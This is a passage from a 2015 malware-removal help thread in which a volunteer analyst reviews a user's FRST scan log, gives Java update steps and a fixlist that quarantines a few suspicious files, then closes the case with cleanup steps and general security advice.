2015-08-21 07:35 - 2015-08-21 07:35 - 05076976 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmantle32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
2015-08-21 07:35 - 2015-08-21 07:35 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2015-08-21 07:35 - 2015-08-21 07:35 - 01196032 _____ C:\WINDOWS\system32\amdocl_as64.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 01070592 _____ C:\WINDOWS\system32\amdocl_ld64.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 01005552 _____ C:\WINDOWS\SysWOW64\amdocl_as32.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 00936928 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00807424 _____ C:\WINDOWS\SysWOW64\amdocl_ld32.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 00660928 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2015-08-21 07:35 - 2015-08-21 07:35 - 00660928 _____ C:\WINDOWS\system32\atiapfxx.blb
2015-08-21 07:35 - 2015-08-21 07:35 - 00472832 _____ C:\WINDOWS\system32\amdmiracast.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00377312 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 00341488 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ATIODE.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 00243696 _____ C:\WINDOWS\system32\clinfo.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 00213488 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00201184 _____ (AMD) C:\WINDOWS\system32\atitmm64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00198640 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00170464 _____ C:\WINDOWS\system32\atieah64.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 00165360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00153456 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00152560 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 00143344 _____ C:\WINDOWS\system32\amdhdl64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00138384 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00136176 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00132080 _____ C:\WINDOWS\SysWOW64\amdhdl32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00122352 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00117600 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00111600 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00111088 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00102384 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00099296 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00095216 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00091104 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00089520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00088000 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00085472 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6pxx.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00082680 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00081160 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00078320 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiglpxx.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00078320 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiglpxx.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00073712 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00071152 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticalrt64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00069600 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00064496 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticalcl64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00062432 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticalrt.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00061408 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ATIODCLI.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 00059376 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmmcl6.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00059360 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticalcl.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00052208 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\ati2erec.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00049632 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmmcl.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00039904 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00012784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00012784 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll
2015-08-21 00:26 - 2015-08-21 00:26 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\NetworkTiles
2015-08-20 12:38 - 2015-08-20 12:38 - 00001241 _____ C:\Users\Public\Desktop\Intel(R) Driver Update Utility 2.2.lnk
2015-08-20 12:38 - 2015-08-20 12:38 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\Intel
2015-08-20 12:38 - 2015-08-20 12:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel Driver Update Utility
2015-08-20 12:37 - 2015-08-20 12:37 - 00000000 ____D C:\ProgramData\Intel
2015-08-20 12:37 - 2015-08-20 12:37 - 00000000 ____D C:\Program Files\Intel
2015-08-20 12:37 - 2015-08-20 12:37 - 00000000 ____D C:\Program Files (x86)\Intel Driver Update Utility
2015-08-20 12:37 - 2015-06-04 03:33 - 00021984 _____ C:\WINDOWS\system32\Drivers\semav6msr64.sys
2015-08-20 12:34 - 2015-08-20 12:36 - 05069632 _____ (Intel) C:\Users\Ken Terry\Downloads\Intel Driver Update Utility Installer.exe

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-09-19 07:45 - 2011-01-31 22:11 - 00000000 ____D C:\Users\Ken Terry\AppData\Roaming\Skype
2015-09-19 07:44 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\sru
2015-09-19 02:03 - 2012-04-04 03:34 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2015-09-19 02:02 - 2015-07-10 07:22 - 00000275 _____ C:\WINDOWS\WindowsUpdate.log
2015-09-19 02:00 - 2011-01-30 18:15 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\Adobe
2015-09-18 18:08 - 2013-03-16 03:58 - 00000346 _____ C:\WINDOWS\Tasks\HP Photo Creations Communicator.job
2015-09-18 17:57 - 2015-06-21 12:44 - 00000934 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001UA.job
2015-09-18 17:51 - 2011-08-24 20:55 - 00000930 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-09-18 17:19 - 2014-05-22 09:23 - 00000586 _____ C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-2815594105-2774959023-4293743994-1001.job
2015-09-18 17:15 - 2015-07-28 13:48 - 00000000 ____D C:\WINDOWS\System32\Tasks\Norton Internet Security
2015-09-18 17:14 - 2015-06-04 18:14 - 00000000 ____D C:\Users\Ken Terry\AppData\Roaming\Raptr
2015-09-18 17:13 - 2013-05-13 11:04 - 00000000 ___RD C:\Users\Ken Terry\Dropbox
2015-09-18 17:13 - 2013-05-13 11:00 - 00000000 ____D C:\Users\Ken Terry\AppData\Roaming\Dropbox
2015-09-18 17:11 - 2011-08-24 20:55 - 00000926 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-09-18 17:09 - 2015-08-11 19:30 - 00144368 ____N (CyberLink Corp.) C:\WINDOWS\system32\Drivers\rikvm_C6F09094.sys
2015-09-18 17:09 - 2015-08-11 18:59 - 00089110 _____ C:\WINDOWS\PFRO.log
2015-09-18 17:09 - 2015-07-10 07:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2015-09-18 17:08 - 2015-07-10 04:05 - 00131072 ___SH C:\WINDOWS\system32\config\BBI
2015-09-18 16:57 - 2015-06-21 12:44 - 00000882 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001Core.job
2015-09-18 15:25 - 2013-05-02 18:20 - 00000944 _____ C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001UA.job
2015-09-18 12:34 - 2015-07-10 08:12 - 00000000 ____D C:\WINDOWS\OCR
2015-09-18 11:42 - 2011-06-15 21:16 - 00000000 ____D C:\Users\Ken Terry\AppData\Roaming\Yahoo!
2015-09-18 11:41 - 2011-02-01 12:52 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\CrashDumps
2015-09-18 11:31 - 2012-11-26 19:24 - 00000000 ____D C:\Users\Ken Terry\Documents\ken pics
2015-09-18 11:19 - 2013-01-30 18:56 - 00000000 ____D C:\Users\Ken Terry\Documents\USAO docs
2015-09-18 11:18 - 2010-08-18 02:46 - 00000000 ____D C:\ProgramData\Temp
2015-09-18 11:14 - 2015-04-10 07:03 - 00000000 ____D C:\ProgramData\iolo
2015-09-18 11:10 - 2012-01-10 22:15 - 00000000 ____D C:\ProgramData\PogoDGC
2015-09-18 11:10 - 2011-01-30 20:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pogo Games
2015-09-18 11:10 - 2009-07-14 00:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-09-18 11:09 - 2014-08-30 16:31 - 00000000 __SHD C:\Users\Ken Terry\AppData\Local\EmieUserList
2015-09-18 11:09 - 2014-08-30 16:31 - 00000000 __SHD C:\Users\Ken Terry\AppData\Local\EmieSiteList
2015-09-18 11:07 - 2011-01-30 20:34 - 00000000 ____D C:\Users\Ken Terry\AppData\Roaming\Oberon Media
2015-09-17 18:37 - 2015-06-04 18:14 - 00000000 ____D C:\Program Files (x86)\Raptr
2015-09-17 18:25 - 2013-05-02 18:20 - 00000922 _____ C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-2815594105-2774959023-4293743994-1001Core.job
2015-09-17 09:02 - 2011-06-15 21:23 - 00000000 ____D C:\Users\Ken Terry\AppData\Roaming\Clip Art Collection
2015-09-17 07:57 - 2009-07-13 21:34 - 00000576 _____ C:\WINDOWS\win.ini
2015-09-17 07:49 - 2015-06-16 08:02 - 00000372 _____ C:\WINDOWS\Tasks\HPCeeScheduleForKen Terry.job
2015-09-15 19:54 - 2015-08-11 19:36 - 00002262 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-09-14 18:24 - 2015-04-13 18:49 - 00003280 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForKen Terry
2015-09-14 18:24 - 2011-01-31 20:28 - 00000052 _____ C:\WINDOWS\SysWOW64\DOErrors.log
2015-09-14 13:46 - 2011-08-24 20:55 - 00003988 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2015-09-14 13:46 - 2011-08-24 20:55 - 00003756 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2015-09-14 12:21 - 2015-07-10 07:20 - 00024554 _____ C:\WINDOWS\setupact.log
2015-09-13 09:18 - 2015-07-10 04:05 - 00032768 ___SH C:\WINDOWS\system32\config\ELAM
2015-09-13 09:15 - 2015-08-11 19:07 - 00000000 ____D C:\Users\Ken Terry
2015-09-13 06:45 - 2011-06-15 21:25 - 00000000 ____D C:\Program Files (x86)\EZ Cards Creator
2015-09-10 10:11 - 2015-07-10 05:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2015-09-10 07:40 - 2011-08-24 20:55 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\Google
2015-09-04 09:44 - 2011-01-30 17:26 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\PDFC
2015-09-02 15:02 - 2012-10-09 13:55 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\Mozilla
2015-09-01 11:35 - 2013-11-01 10:54 - 00000000 ____D C:\Users\Ken Terry\Documents\Ken Medical
2015-09-01 06:03 - 2011-03-05 17:04 - 00000000 ____D C:\Program Files (x86)\Steam
2015-08-29 03:31 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\AppReadiness
2015-08-22 11:42 - 2011-01-30 17:18 - 00101544 _____ C:\Users\Ken Terry\AppData\Local\GDIPFONTCACHEV1.DAT
2015-08-21 13:12 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\rescache
2015-08-21 07:39 - 2015-08-11 19:04 - 00000000 ____D C:\Program Files (x86)\ATI Technologies
2015-08-21 07:36 - 2015-06-04 18:43 - 00000000 ____D C:\AMD
2015-08-21 07:35 - 2015-07-16 02:12 - 00162240 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiuxp64.dll
2015-08-21 07:35 - 2015-07-16 02:12 - 00111832 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 12062040 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atidxx64.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 10191264 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atidxx32.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 08979760 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiumd6a.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 08865496 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiumd64.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 08009344 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiumdva.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 07482560 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiumdag.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 01468224 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 01213192 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 00143048 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiuxpag.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 00131592 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiu9p64.dll
2015-08-21 07:35 - 2015-07-16 02:11 - 00113880 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiu9pag.dll
2015-08-21 07:35 - 2015-07-16 02:06 - 21632992 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\atikmdag.sys
2015-08-21 07:35 - 2015-07-16 02:00 - 39723504 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\amdocl.dll
2015-08-21 07:35 - 2015-07-16 01:57 - 22328800 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\amdocl12cl.dll
2015-08-21 07:35 - 2015-07-16 01:17 - 00681456 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2015-08-21 07:35 - 2015-07-16 01:17 - 00452576 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2015-08-21 07:35 - 2015-07-16 01:17 - 00256992 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2015-08-21 07:35 - 2015-07-16 01:13 - 01257952 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2015-08-21 07:35 - 2015-07-16 01:13 - 00936928 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2015-08-21 07:35 - 2015-07-16 01:13 - 00675296 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\atikmpag.sys
2015-08-21 07:35 - 2015-07-16 01:13 - 00152032 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2015-08-21 07:35 - 2015-07-16 01:12 - 00874480 _____ (AMD) C:\WINDOWS\system32\coinst_15.20.dll
2015-08-21 05:34 - 2015-08-11 19:06 - 01006528 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2015-08-20 13:34 - 2015-07-10 07:20 - 04988600 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-08-20 13:33 - 2013-03-14 03:02 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2015-08-20 13:33 - 2013-03-14 03:02 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2015-08-20 13:29 - 2015-07-10 06:04 - 00000000 ___RD C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-08-20 13:29 - 2015-07-10 06:04 - 00000000 ___RD C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-08-20 13:29 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2015-08-20 13:29 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\oobe
2015-08-20 13:29 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\appraiser
2015-08-20 13:29 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\Provisioning
2015-08-20 13:09 - 2013-03-14 03:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2015-08-20 13:07 - 2013-08-16 03:01 - 00000000 ____D C:\WINDOWS\system32\MRT
2015-08-20 12:57 - 2015-08-11 19:52 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\Packages
2015-08-20 12:54 - 2011-02-04 06:02 - 132483416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2015-08-20 12:51 - 2011-04-13 10:48 - 00000000 ____D C:\ProgramData\Microsoft Help
2015-08-20 12:37 - 2015-08-11 19:03 - 00000000 ____D C:\ProgramData\Package Cache

==================== Files in the root of some directories =======

2011-02-12 20:23 - 2011-02-12 20:23 - 0000697 _____ () C:\Users\Ken Terry\AppData\Roaming\ConvAPIPlugin.log
2014-10-25 05:15 - 2014-10-25 05:15 - 0000000 _____ () C:\Users\Ken Terry\AppData\Local\{70F50B53-050D-4745-ACDA-69E224C8841A}
2013-03-06 16:15 - 2013-03-06 16:15 - 0000057 _____ () C:\ProgramData\Ament.ini
2011-02-12 18:54 - 2013-11-12 16:31 - 0007100 _____ () C:\ProgramData\hpzinstall.log

Some files in TEMP:
====================
C:\Users\Ken Terry\AppData\Local\Temp\driver-updater-setup.exe
C:\Users\Ken Terry\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpvbbmmf.dll
C:\Users\Ken Terry\AppData\Local\Temp\rscp_setup.exe
C:\Users\Ken Terry\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-08-11 18:59

==================== End of FRST.txt ============================
kfoxsr is offline  
Old 09-21-2015, 08:08 AM   #15
Security Team
Analyst
 
Larusso's Avatar
 
Join Date: Oct 2009
Location: Wels\ Austria
Posts: 729
OS: Win7 / Win 10 TechPreview



Hy there and sorry for the delay. Was busy yesterday.


Your Java is out of date. Older versions have vulnerabilities that malware can use to infect your system. Please follow these steps to remove older version Java components and update.
  • Download the latest version of Java Runtime Environment (JRE) 7 and Save it to your Desktop.
  • Scroll down to where it says Java SE 8u60
  • Click the Download button under JRE to the right.
  • Read the License Agreement then select Accept License Agreement
  • Click on the link to download Windows x86 Offline and save the file to your desktop.
  • Close any programs you may have running - especially your web browser.
  • Go to Start > Control Panel, double-click on Add or Remove Programs and remove all older versions of Java.
  • Check (highlight) any item with Java Runtime Environment (JRE or J2SE or Java(TM) 6) in the name.
  • Click the Remove or Change/Remove button.
  • Repeat as many times as necessary to remove each Java versions.
  • Reboot your computer once all Java components are removed.
  • Then from your desktop double-click on jre-8u60-windows-i586.exe to install the newest version.
  • After the install is complete, go into the Control Panel (using Classic View) and double-click the Java Icon. (looks like a coffee cup)
    • On the General tab, under Temporary Internet Files, click the Settings button.
    • Next, click on the Delete Files button
    • There are three options in the window to clear the cache - Leave these two Checked
      • Trace and Log Files
        Cached Applications and Applets
      • Click OK on Delete Temporary Files Window
        Note: This deletes ALL the Downloaded Applications and Applets from the CACHE.
      • Click OK to leave the Temporary Files Window
      • Click OK to leave the Java Control Panel.

[*]Please copy all the text in the codebox below. (To do this highlight the contents of the box, right-click on it and select Copy. Right-click in the open Notepad and select Paste). [*]Save it as fixlist.txt next to FRST[*]If asked to change 'Encoding:' to 'Unicode:', please agree and save it.

NOTE: Both FRST64.exe and the fixlist.txt must be in the same location or the fix will not work.

Code:
C:\Users\Ken Terry\AppData\LocalLow\Protected
C:\Users\Ken Terry\AppData\Local\Temp\rscp_setup.exe
C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Default\aagcdddgdhgbgbdjgggedadgdedcdbdb\background.js
EmptyTemp:
[*]Double-click FRST64 to run the tool. If the tool warns you the version is outdated, please download and run the updated version.[*]Click the Fix button just once, and wait.
[*]If you receive a message that a reboot is required, please make sure you allow it to restart normally.
[*]The tool will complete its run after the restart.[*]When finished, the tool will make a log (Fixlog.txt) in the same location from where it was run. Please post the Fixlog.txt log in your reply.[/list]
NOTE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
__________________
regards, Daniel


There will never be peace in a war so I don't understand what they are fighting for

ASAP & UNITE Member
Larusso is offline  
Old 09-21-2015, 01:39 PM   #16
Registered Member
 
Join Date: Sep 2015
Posts: 13
OS: windows 10



Fix result of Farbar Recovery Scan Tool (x64) Version:15-09-2015
Ran by Ken Terry (2015-09-21 15:26:28) Run:2
Running from C:\Users\Ken Terry\Downloads
Loaded Profiles: Ken Terry (Available Profiles: Ken Terry & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
C:\Users\Ken Terry\AppData\LocalLow\Protected
C:\Users\Ken Terry\AppData\Local\Temp\rscp_setup.exe
C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Default\aagcdddgdhgbgbdjgggedadgdedcdbdb\background.js
EmptyTemp:
*****************

C:\Users\Ken Terry\AppData\LocalLow\Protected => moved successfully
C:\Users\Ken Terry\AppData\Local\Temp\rscp_setup.exe => moved successfully
C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Default\aagcdddgdhgbgbdjgggedadgdedcdbdb\background.js => moved successfully
EmptyTemp: => 49.4 GB temporary data Removed.


The system needed a reboot..

==== End of Fixlog 15:29:41 ====
kfoxsr is offline  
Old 09-22-2015, 08:40 AM   #17
Security Team
Analyst
 
Larusso's Avatar
 
Join Date: Oct 2009
Location: Wels\ Austria
Posts: 729
OS: Win7 / Win 10 TechPreview



Well done

Unless you have any open issues, you are good to go.
Please follow these last few steps.

Please download delfix to your desktop.

  • Close all other programs and start delfix.
  • Right-click on delfix.exe and select " Run as administrator " to run it.
  • Ensure Remove disinfection tools is ticked. Also tick: Create registry backup, Purge system restore
  • Click Run
  • delfix will now delete all found traces of our removal process.

Note: The program will run for a few moments and then notepad will open with a log. No need to post this log.


Now that you appear to be clean, let me give you some advise to stay that way.

Anti Virus Program
  • Make sure to have one Anti Virus program installed and update it on a regular basis. It is useless with out of date definitions.


Additional Protection
  • Malwarebytes Anti Malware
    The freeware Version is an on demand scanner which will check your system for malware. Update it once a week and run a Quick Scan. You can also buy a licence which offers more features.
  • WinPatrol
    WinPatrol takes snapshot of your critical system resources and alerts you to any changes that may occur without your knowledge.
  • Malwarebytes Anti Exploit
    Protects you against drive-by downloads and blocks known and unknown exploit kits.

Use an alternate browser
Other browsers tend to be more secure than IE as they do not make use of active x objects. Active x objects can be used by spyware as an infection point on your computer.
There are some very helpfull Add-Ons for the most common browsers.
I recommend to have the following installed
  • AddBlockPlus
  • NoScript
  • WOT ( Web of trust )

Keep in mind that there is no such software which will protect your system from yourself.
Here is a very helpfull article, written by miekemoes
Think Prevention


Please respond to this topic one more time so I can mark this topic as solved.

Happy surfin'
__________________
regards, Daniel


There will never be peace in a war so I don't understand what they are fighting for

ASAP & UNITE Member
Larusso is offline  
Old 09-22-2015, 11:21 AM   #18
Registered Member
 
Join Date: Sep 2015
Posts: 13
OS: windows 10



Thanks Daniel.
kfoxsr is offline  
 

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Similar Threads
Thread Thread Starter Forum Replies Last Post
Redirecter in my win 8.1 sync settings or ???
Ok so for some time now malware bytes is blocking my metro/modern/etc IE of windows 8.1 from redirecting to androrat.xx.xx (put x's for safety but it's co.cc) and to ncrypt.xx (it started with ncrypt but today i saw the androrat one and - kinda forgot about this one but i do know it might be .in or...
Medicated Virus/Trojan/Spyware Help 26 07-15-2015 07:04 PM
BOSD help
· OS - windows 7 · x86 (32-bit) · What was original installed OS on system? none · Is the OS an OEM version (came pre-installed on system) or full retail version (YOU purchased it from retailer)? NO · Age of system (hardware): 3-4 years · Age of OS installation - have you re-installed the OS?...
bonz129 BSOD, App Crashes And Hangs 1 05-06-2013 02:03 PM
A Challenge?
Any help with this would be really appreciated! So, -I kept getting directed to the wrong (avast tells me malicious) websites when I clicked a link with Bing or Google, has been happening for a couple weeks, with increased frequency -10 days or so ago, found out it might be this "misdirect...
needhelp1234222 Resolved HJT Threads 22 06-26-2012 09:55 PM
computer restarts
computer keeps restarting when I am online. got pc checked fully. no problem. thought usb modem used for dsl connection (speedtouch 330) may be the problem. so shifted to dialup but the problem continues. what can be the problem? am attaching a dump file which was created. would deeply appreciate...
kpsomu BSOD, App Crashes And Hangs 11 10-05-2011 11:47 PM
Multiple bsods all related to different drivers help!(zip attached)....
Alright this has been bugging me for a long time, I keep getting bsods on a self built machine, everytime I seem to have beaten one another pops up I just dont know what to do, ive tried updating, replacing drivers, replacing the memory everything im at my wits end can you take a look at my zip...
thatcrazypengui BSOD, App Crashes And Hangs 5 09-01-2011 09:51 PM

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is on
Smilies are on
[IMG] code is on
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off


Post a Question


» Site Navigation
